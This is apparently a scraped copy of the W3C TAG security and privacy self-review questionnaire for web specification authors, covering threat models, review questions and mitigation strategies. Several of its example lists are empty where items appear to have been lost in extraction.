Self-Review Questionnaire: Security and Privacy

A Collection of Interesting Ideas,

This version:
https://w3ctag.github.io/security-questionnaire/
Version History:
https://github.com/w3ctag/security-questionnaire/commits/master/index.src.html
Issue Tracking:
GitHub
Inline In Spec
Editor:
(Independent researcher)
Former Editor:
(Google Inc.)
Bug Reports:
via the w3ctag/security-questionnaire repository on GitHub

Abstract

This document provides a points to help in considering the privacy impact of a new feature or specification as well as common mitigation strategies for common privacy impacts. The questions are meant to be useful when considering the security and privacy aspects of a new feature or specification and the mitigation strategies are meant to assist in the design of the feature or specification. Authors of a new proposal or feature should implement the mitigations as appropriate; doing so will assist in addressing the respective points in the questionnaire. Given the variety and nature of specifications, it is likely that the listed questions will not be comprehensive in a way enabling to reason about the full privacy impact, and some mitigations may not be appropriate or other mitigations may be necessary. It is nonetheless the aim to present the questions and mitigations as a starting point, helping to consider security and privacy at the start of work on a new feature, and throughout the lifecycle of a feature.

It is not meant as a "security checklist", nor does an editor or group’s use of this questionnaire obviate the editor or group’s responsibility to obtain "wide review" of a specification security and privacy properties before publication. Furthermore, the filled questionnaire should not be understood as security and privacy considerations, although part of the answers may be relevant in drafting the considerations.

1. Introduction

New features make the web a stronger and livelier platform. Throughout the feature development process — planning, drafting, and implementing — there are both foreseeable and unexpected security and privacy risks. These risks may arise from the nature of the feature, some of its part(s), or unforeseen interactions with other features and may be mitigated through careful design and consideration of security and privacy design patterns.

Standardizing web features presents unique challenges as, inherently, the web standardization process requires multiple independent implementations of a feature. As a result, descriptions, protocols and algorithms need to be considered strictly so they are broadly adoption by vendors with large user bases.

A user agent is the user’s agent, and it is important that feature authors consider that if their feature contains privacy risks, then, user agents may implement the feature in a compatibility breaking way to protect user privacy. This is especially true if and when features are not clearly defined and privacy exposures are identified and left unmitigated — or left to user agents to mitigate — vendors may implement their own compatibility breaking mitigations that risk wide adoption of the feature.

This is why each Working Group needs to consider security and privacy by default. This consideration is mandatory. Furthermore, assessing the impact of a mechanism on privacy should be done from the ground up, during each iteration of the specification. The questionnaire and guidance presented here is meant to assist authors consider security and privacy in their feature as earlier as possible — beginning with ideation in Community Groups through to formalization in Working Groups. The guidance should help authors develop standards with privacy by default allowing for the questionnaire to be addressed simply and straightforwardly.

Providing adequate and informative answers to the questions, such as providing context, or explaining the reasoning behind certain choices, will also help in a wide security and privacy review performed later on, within the W3C review proces, and beyond.

This document encourages early review by posing a number of questions that you as an individual reader/writer/contributor of a specification can ask —and that working groups and spec editors need to consider, prior asking for a more formal review. The intent is to highlight areas which have historically had interesting implications on a user’s security or privacy, and thereby to focus the editor, working group attention, and reviewers' attention on areas that might previously have been overlooked.

This document does not attempt to define what privacy is (in a Web context). Instead privacy is the sum of what is contained in this document. While this may not be exactly what most readers would typically assume but privacy is a complicated concept with a rich history that spans many disciplines and there remains confusion over the meaning.

The audience of this document is general:

2. How To Use The Questionnaire

Thinking about security and privacy risks and mitigations early in a project is the best approach as it helps ensure the privacy of your feature at an architectural level and ensures the result, descriptions, protocols and algorithms incorporate privacy by default as opposed to through possible implementation mitigations.

The Privacy Interest Group (PING) recommends that a feature group review the guidance and questionnaire when first considering their feature and meet with PING at that time to discuss any questions they have about how the guidance/questionnaire intersects with their feature at a conceptual level. After the feature group has developed their feature with the guidance/questionnaire informing their development process, the group should bring an early draft of their feature specification with Privacy consideration section to PING for review. From there the feature group should iterate on their design.

When requesting a Technical Architecture Group review, include the filled questionnaire, along with the description of changes or observations made during the design process. This allows external reviewers understand the rationale, as well as the challenges and evolution of the feature, with respect to security and privacy.

It is understandable that developers may not always have the necessary data to see the broader picture and possible implications, for example in relation to other existing web functionalities. The answers to the questionnaire are meant as help and input for people who may nonetheless make security and privacy remarks, or the assessment.

3. Threat Models

To consider security and privacy it is convenient to think in terms of threat models, a way to illuminate the possible risks.

There are some concrete privacy concerns that should be considered when developing a feature for the web platform:

In the mitigations section, this document outlines a number of techniques that can be applied to mitigate these risks.

Enumerated below are some broad classes of threats that should be considered when developing a web feature.

3.1. Passive Network Attackers

A passive network attacker has read-access to the bits going over the wire between users and the servers they’re communicating with. She can’t modify the bytes, but she can collect and analyze them.

Due to the decentralized nature of the internet, and the general level of interest in user activity, it’s reasonable to assume that practically every unencrypted bit that’s bouncing around the network of proxies, routers, and servers you’re using right now is being read by someone. It’s equally likely that some of these attackers are doing their best to understand the encrypted bits as well, including storing encrypted communications for later cryptanalysis (though that requires significantly more effort).

3.2. Active Network Attackers

An active network attacker has both read- and write-access to the bits going over the wire between users and the servers they’re communicating with. She can collect and analyze data, but also modify it in-flight, injecting and manipulating Javascript, HTML, and other content at will. This is more common than you might expect, for both benign and malicious purposes:

3.3. Same-Origin Policy Violations

The same-origin policy is the cornerstone of security on the web; one origin should not have direct access to another origin’s data (the policy is more formally defined in Section 3 of [RFC6454]). A corollary to this policy is that an origin should not have direct access to data that isn’t associated with any origin: the contents of a user’s hard drive, for instance. Various kinds of attacks bypass this protection in one way or another. For example:

3.4. Third-Party Tracking

Part of the power of the web is its ability for a page to pull in content from other third parties — from images to javascript — to enhance the content and/or a user’s experience of the site. However, when a page pulls in content from third parities, it inherently leaks some information to third parties — referer information and other information that may be used to track and profile a user. This includes the fact that cookies go back to the domain that initially stored them allowing for cross origin tracking. Moreover, third parties can gain execution power through third party Javascript being included by a webpage. While pages can take steps to mitigate the risks of third party content and browsers may differentiate how they treat first and third party content from a given page, the risk of new functionality being executed by third parties rather than the first party site should be considered in the feature development process.

3.5. Legitimate Misuse

Even when powerful features are made available to developers, it does not mean that all the uses should always be a good idea, or justified; in fact, data privacy regulations around the world may even put limits on certain uses of data. In the context of first party, a legitimate website is potentially able to interact with powerful features to learn about the user behavior or habits. For example:

This point is admittedly different from others - and underlines that even if something may be possible, it does not mean it should always be done, including the need for considering a privacy impact assessment or even an ethical assessment. When designing a specification with security and privacy in mind, all both use and misuse cases should be in scope.

4. Questions to Consider

4.1. How does the specification deal with personal information allowing to single out the user?

Personal data are information relating to individuals. Singling out the user is possible when some unique information or traits are collected. For example, personal data allow singling out individuals on its own, or in combination with other information, to identify a specific person. The exact definition of what is considered PII varies around the world and is rapidly evolving, but may include, among the others, things like a home address, an email address, birthdates, usernames, fingerprints, biometric data, health information, but also identifiers such as cookies, identifiers, IP address, health status, preferences, affinities, beliefs, and much more, depending on the context.

If the specification under consideration exposes personal data to the web, it’s important to consider ways to mitigate the impacts. For instance:

If the specification deals with or introduces identifiers (persistent or not), the process should be documented, along with the nature of the identifier and its lifetime, whether it is limited to a particular origin or not.

4.2. How does this specification deal with high-value data?

Data which isn’t personally-identifiable can still be quite valuable. Sign-in credentials (like username/password pairs, or OAuth refresh tokens) can be extrememly powerful in the wrong hands, as can financial instruments like credit card data. Making this data available to JavaScript, for instance, could expose it to XSS attacks and active network attackers who could inject code to read and exfiltrate the data. For instance:

4.3. Might this specification introduce new state for an origin that persists across browsing sessions?

For example:

4.4. Does this specification expose persistent, cross-origin state to the web?

For example:

4.5. Does this specification expose any other data to an origin that it doesn’t currently have access to?

As noted above in §3.3 Same-Origin Policy Violations, the same-origin policy is an important security barrier that new features need to carefully consider. If a specification exposes details about another origin’s state, or allows POST or GET requests to be made to another origin, the consequences can be severe.

4.6. Does this specification enable new script execution/loading mechanisms?

4.7. Does this specification allow an origin access to a user’s location?

A user’s location is highly-desirable information for a variety of use cases. It is also, understandably, information which many users are reluctant to share, as it can be both highly identifying, and potentially creepy. New features which make use of geolocation information, or which expose it to the web in new ways should carefully consider the ways in which the risks of unfettered access to a user’s location could be mitigated. For instance:

4.8. Does this specification allow an origin access to sensors on a user’s device?

Powerful features allowing to query information about the user system or environment may open new interesting use cases, as well as expanding risks and changing threat models. Examples of new feature of the kind may include sensors, communication channels such as Bluetooth or USB.

4.9. Does this specification allow an origin access to aspects of a user’s local computing environment?

Features enabling to modify or query screen sizes or installed fonts may be useful but in some contexts might be introducing possible risks. Additionally, functionality facilitating access reason about the user computing environment such as by means of bluetooth or USB should be accounted for, whether the employed identifiers are long term or not.

4.10. Does this specification allow an origin access to other devices?

Accessing other devices, both via network connections and via direct connection to the user’s machine (e.g. via Bluetooth, NFC, or USB), could expose vulnerabilities - some of these devices were not created with web connectivity in mind and may be inadequately hardened against malicious input, or with the use on the web.

4.11. Does this specification allow an origin some measure of control over a user agent’s native UI?

This concerns interaction with the UI, such as modification of browser display, or even such things as displaying a common pop-up with origin-controlled input, such as Notifications.

4.12. Does this specification expose temporary identifiers to the web?

Some identifiers may be difficult to pin-point but they revolve around information that is stable in short-term manner (seconds, minutes, days) and may be available to web origins, whether in cross-origin manner or even cross-browser manner.

4.13. Does this specification distinguish between behavior in first-party and third-party contexts?

4.14. How does this specification work in the context of a user agent’s Private Browsing Modes mode?

Some web features behave differently in private browsing modes (with respect to normal browsing modes). This is not always desirable. Features should work in such a way that the website would not be able to determine that the user was in a privacy browsing mode. This includes graceful degradation when a feature stops functioning in a way still not revealing the browsing mode. Some examples

Some examples:

4.15. Does this specification persist data to a user’s local device?

User agents are able to store persistent data to user’s devices. The simplest examples are browsing history, cookies, or localStorage.

4.16. Does this specification have a "Security Considerations" and "Privacy Considerations" section?

Documenting the various concerns and potential abuses in "Security Considerations" and "Privacy Considerations" sections of a document is a good way to help implementers and web developers understand the risks that a feature presents, and to ensure that adequate mitigations are in place. I f it seems like a feature does not have security or privacy impacts, then say so inline in the spec section for that feature:

There are no known security or privacy impacts of this feature.

Saying so explicitly in the specification serves several purposes:

  1. Shows that a spec author/editor has explicitly considered security and privacy when designing a feature.
  2. Provides some sense of confidence that there might be no such impacts.
  3. Challenges security and privacy minded individuals to think of and find even the potential for such impacts.
  4. Demonstrates the spec author/editor’s receptivity to feedback about such impacts.
  5. Demonstrates a desire that the specification should not be introducing security and privacy issues

When saying this, however, the crucial aspect is to actually considering security and privacy. All new specifications must have security and privacy considerations sections to be considered for wide reviews. Interesting features added to the web platform generally often already had security and/or privacy impacts.

4.17. Does this specification allow downgrading default security characteristics?

4.18. Does this specification allow the persistent monitoring of user behavior?

Users on the web can be monitored in variaty of means, for example using access to sensors potentially providing mobility patterns (e.g. accelerator, light sensor, web bluetooth), or directly on the web such as the monitoring of mouse movement, which are biometric data conveying rich information.

5. Mitigation Strategies

5.1. Secure Contexts

In the presence of an active network attacker, offering a feature to an insecure origin is the same as offering that feature to every origin (as the attacker can inject frames and code at will). Requiring an encrypted and authenticated connection in order to use a feature can mitigate this kind of risk.

5.2. Explicit user mediation

If a feature has privacy or security impacts that are endemic to the feature itself, then one valid strategy for exposing it to the web is to require user mediation before granting an origin access. For instance, [GEOLOCATION-API] reveals a user’s location, and wouldn’t be particularly useful if it didn’t; user agents generally gate access to the feature on a permission prompt which the user may choose to accept.

Designing such prompts is difficult. Choosers are good. Walls of text are bad.

Bring in some of felt@'s ideas here.

5.3. Drop the feature

The simplest way to mitigate potential negative security or privacy impacts of a feature, and even discussing the possibility, is to drop the feature. Every feature in a spec should be considered guilty (of harming security and/or privacy) until proven otherwise.

Every specification should seek to be as small as possible, even if only for the reasons of reducing and minimizing security/privacy attack surface(s).

By doing so we can reduce the overall security (and privacy) attack surface of not only a particular feature, but of a module (related set of features), a specification, and the overall web platform.

Examples

6. How to Use the questionnaire

To ensure good designs, security and privacy should be considered as early as possible. This questionnaire facilitates this and the questions should be considered early in the specification development process, kept in mind as it matures, with the answers being updated along the specification evolution. This questionnaire should not be used as a “check box" excercise before requesting final publication - acting in this manner does not help improve privacy or security on the Web. Each question needs to be considered and that any privacy or security concerns are described, along with a possible mitigation strategy. It is not a good approach to provide a one-word answer (“yes” / “no”). Rather, it is expected to include an explanatory description. The questions in the questionnaire are more about “why” and “how”, rather than “if”.

It is expected that a questionnaire must be filled in prior to obtaining a W3C Working Draft status, and prior to requiring a review, along the Privacy by Design principles. The questionnaire and its answers should not be included in the specification itself. It is preferable to keep it in a standard and easily available place, with a link available in the TAG repository.

Conformance

Conformance requirements are expressed with a combination of descriptive assertions and RFC 2119 terminology. The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in the normative parts of this document are to be interpreted as described in RFC 2119. However, for readability, these words do not appear in all uppercase letters in this specification.

All of the text of this specification is normative except sections explicitly marked as non-normative, examples, and notes. [RFC2119]

Examples in this specification are introduced with the words “for example” or are set apart from the normative text with class="example", like this:

This is an example of an informative example.

Informative notes begin with the word “Note” and are set apart from the normative text with class="note", like this:

Note, this is an informative note.

Index

Terms defined by this specification

Terms defined by reference

References

Normative References

[RFC2119]
S. Bradner. Key words for use in RFCs to Indicate Requirement Levels. March 1997. Best Current Practice. URL: https://tools.ietf.org/html/rfc2119
[SVG2]
Amelia Bellamy-Royds; et al. Scalable Vector Graphics (SVG) 2. 4 October 2018. CR. URL: https://www.w3.org/TR/SVG2/

Informative References

[BEACON]
Ilya Grigorik; et al. Beacon. 13 April 2017. CR. URL: https://www.w3.org/TR/beacon/
[CORS]
Anne van Kesteren. Cross-Origin Resource Sharing. 16 January 2014. REC. URL: https://www.w3.org/TR/cors/
[CSP]
Mike West. Content Security Policy Level 3. 13 September 2016. WD. URL: https://www.w3.org/TR/CSP3/
[GEOFENCING]
Marijn Kruisselbrink. Geofencing API. 30 May 2017. NOTE. URL: https://www.w3.org/TR/geofencing/
[GEOLOCATION-API]
Andrei Popescu. Geolocation API Specification 2nd Edition. 8 November 2016. REC. URL: https://www.w3.org/TR/geolocation-API/
[HTML-IMPORTS]
Dimitri Glazkov; Hajime Morita. HTML Imports. 25 February 2016. WD. URL: https://www.w3.org/TR/html-imports/
[RFC6454]
A. Barth. The Web Origin Concept. December 2011. Proposed Standard. URL: https://tools.ietf.org/html/rfc6454
[RFC7258]
S. Farrell; H. Tschofenig. Pervasive Monitoring Is an Attack. May 2014. Best Current Practice. URL: https://tools.ietf.org/html/rfc7258
[SERVICE-WORKERS]
Alex Russell; et al. Service Workers 1. 2 November 2017. WD. URL: https://www.w3.org/TR/service-workers-1/
[WEBMESSAGING]
Ian Hickson. HTML5 Web Messaging. 19 May 2015. REC. URL: https://www.w3.org/TR/webmessaging/

Issues Index

Bring in some of felt@'s ideas here.